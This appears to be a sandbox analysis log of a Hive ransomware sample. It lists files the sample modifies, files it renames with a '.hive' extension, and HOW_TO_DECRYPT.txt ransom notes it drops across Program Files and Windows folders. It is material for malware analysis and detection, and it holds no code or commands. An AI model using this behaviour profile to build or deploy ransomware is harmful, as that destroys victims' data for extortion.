File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.scale-400.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONBttnPPT.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\202.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-60_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailSplashLogo.scale-250.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-hover_32.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\PREVIEW.GIF.P7EsMTWem2f4DapaPblE9BlnkxlS9YQllD3nUpaK9Eo.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\resources.pak.DATA.P7EsMTWem2f4DapaPblE9PSmXvAta_JqUP56tyeEGTo.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsMedTile.contrast-black_scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.SecureString.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui.P7EsMTWem2f4DapaPblE9AuHrQaaDXlDVGqGIllTijo.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-namedpipe-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGIB.TTF.P7EsMTWem2f4DapaPblE9N9WkJwDaKIFhphO3V9SeQ4.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\zlibwapi.dll.P7EsMTWem2f4DapaPblE9FAK8e5LuWsFN3tP-2Rk0wc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ro.pak.P7EsMTWem2f4DapaPblE9OxFCp75q308UWmFVzVcogg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\NewNotePlaceholder-dark.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-ppd.xrm-ms.P7EsMTWem2f4DapaPblE9Iug6pFcybIlgFi-LU92Yhw.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Runtime.InteropServices.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-sl\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\proofing.msi.16.en-us.tree.dat.P7EsMTWem2f4DapaPblE9PELDBezftc1xes91Op6jBs.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right.gif.P7EsMTWem2f4DapaPblE9IPXwRs6EwMqDK5EsTxwVUA.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js.P7EsMTWem2f4DapaPblE9CEvoU-M2td-iXWpVvrfvGg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\en-US\PackageManagementDscUtilities.strings.psd1.P7EsMTWem2f4DapaPblE9PZJe1ZgBUwtbzbv8rzUuBc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Controls\EndOfLife\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_field_grabber.png.P7EsMTWem2f4DapaPblE9O_MlC_RsF44NXcIPKcbIwc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\IC_WelcomeBanner.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Text.Encodings.Web.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\decora_sse.dll.P7EsMTWem2f4DapaPblE9PD0BmXDN7JX9keKpkGeX1o.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-30_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\preloaded_data.pb.DATA.P7EsMTWem2f4DapaPblE9Ou3jzKHGGsk_4I_XnnhIEA.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_PigNose.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_ur.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\PresentationFramework.resources.dll.P7EsMTWem2f4DapaPblE9DGMyl3gAfgbESWq6F7fSiQ.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\prism_common.dll.P7EsMTWem2f4DapaPblE9HXDaPkZ-gZv9DM0I8sk2xE.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.Preview.winmd C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..lowbroker.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_521d56dcb4ef479b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-hlink_31bf3856ad364e35_10.0.19041.1237_none_d6d991394db08f86\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-m..ac-ado-ddl-security_31bf3856ad364e35_10.0.19041.264_none_9a64e210d3a49e6c\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-dafwfdprovider_31bf3856ad364e35_10.0.19041.1_none_b058c457605b2980\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-k..l-pnp-adm.resources_31bf3856ad364e35_10.0.19041.1_it-it_e961f8e21ea93e0a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-m..mentmanifests-shell_31bf3856ad364e35_10.0.19041.423_none_9e37e96dfd85e9b1\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-mapcontrol-desktop_31bf3856ad364e35_10.0.19041.746_none_2999d52b8db06219\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_windows-id-connecte..nt-provider-activex_31bf3856ad364e35_10.0.19041.1_none_211e6839b16031fe\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-n..rity-domain-clients_31bf3856ad364e35_10.0.19041.1_none_db2033aec5f4055d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-i..l-keyboard-0000044b_31bf3856ad364e35_10.0.19041.1_none_b2edb67cf59d8460\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup.resources_31bf3856ad364e35_11.0.19041.1_uk-ua_651962b808b5b764\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-certutil.resources_31bf3856ad364e35_10.0.19041.1_es-es_85df3743bdb65309\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-explorer.resources_31bf3856ad364e35_10.0.19041.1023_en-us_7aca3dab28c636fc\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_system.printing_31bf3856ad364e35_10.0.19041.1_none_cd12d4bd5d1c62ec\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-mdm-adm_31bf3856ad364e35_10.0.19041.1_none_afd04b8235cdb4f2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.ServiceModel.Resources\3.0.0.0_it_b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_hyperv-commandline-tool_31bf3856ad364e35_10.0.19041.928_none_0b17415ae0dd0379\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-i..o4-codecs.resources_31bf3856ad364e35_10.0.19041.1_en-us_57d193173da3f87b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-onecore-c..clientapi.resources_31bf3856ad364e35_10.0.19041.1_de-de_9b306a53cd56cfa2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-devices-wifidirect_31bf3856ad364e35_10.0.19041.264_none_7507f2201fb551a4\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\msil_system.serviceprocess.resources_b03f5f7f11d50a3a_10.0.19041.1_it-it_ae68d65583e97eab\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\msil_microsoft.powershell.security.resources_31bf3856ad364e35_1.0.0.0_ja-jp_81063264f1136d5e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_windows-media-speech-winrt_31bf3856ad364e35_10.0.19041.264_none_fbb15bbadd313556\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-b..roxy-main.resources_31bf3856ad364e35_10.0.19041.1_en-us_3813956db567ed0e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-omadmclient_31bf3856ad364e35_10.0.19041.1151_none_c86feb6936a97173\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig.resources\v4.0_4.0.0.0_es_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-n..pprovider.resources_31bf3856ad364e35_10.0.19041.1_es-es_41e0d1946a7c5321\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\msil_system.messaging.resources_b03f5f7f11d50a3a_10.0.19041.1_de-de_917d3b2b93fb8e53\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities.Resources\2.0.0.0_ja_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-payments_31bf3856ad364e35_10.0.19041.746_none_3c6d03c57404e0f9\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-directui.resources_31bf3856ad364e35_10.0.19041.1023_pt-br_e4a05bc207bb3d6f\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-mediaplayer-wmvcore_31bf3856ad364e35_10.0.19041.1202_none_1fd41533d2b067a4\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-b..2provider.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_02970791e1e5a4d5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..airingdll.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_a49ef473cdccb95c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-m..dac-rds-persist-dll_31bf3856ad364e35_10.0.19041.1_none_4a9e393bc6b3251b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-ie-f12app_31bf3856ad364e35_11.0.19041.746_none_3439cbf8eff84ce1\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_dual_input.inf_31bf3856ad364e35_10.0.19041.868_none_06aed3f048cb8494\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-devicepropertymanager_31bf3856ad364e35_10.0.19041.746_none_9ae154761e6a5add\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration.resources\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-powercpl_31bf3856ad364e35_10.0.19041.423_none_3fecd70fd2fa0d37\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-wmi-filter.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_1b28da3746b5dd0d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-r..systemmanufacturers_31bf3856ad364e35_10.0.19041.746_none_4d8cd7989326ef85\f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\amd64_windows-gaming-xbox..e-service-component_31bf3856ad364e35_10.0.19041.264_none_31474dbf12ce5adc\r\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-api_31bf3856ad364e35_10.0.19041.1266_none_2b4b7ff44edc4a8b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\INF\BITS\0411\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\INF\Windows Workflow Foundation 3.0.0.0\0409\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands.Resources\v4.0_10.0.0.0_ja_31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
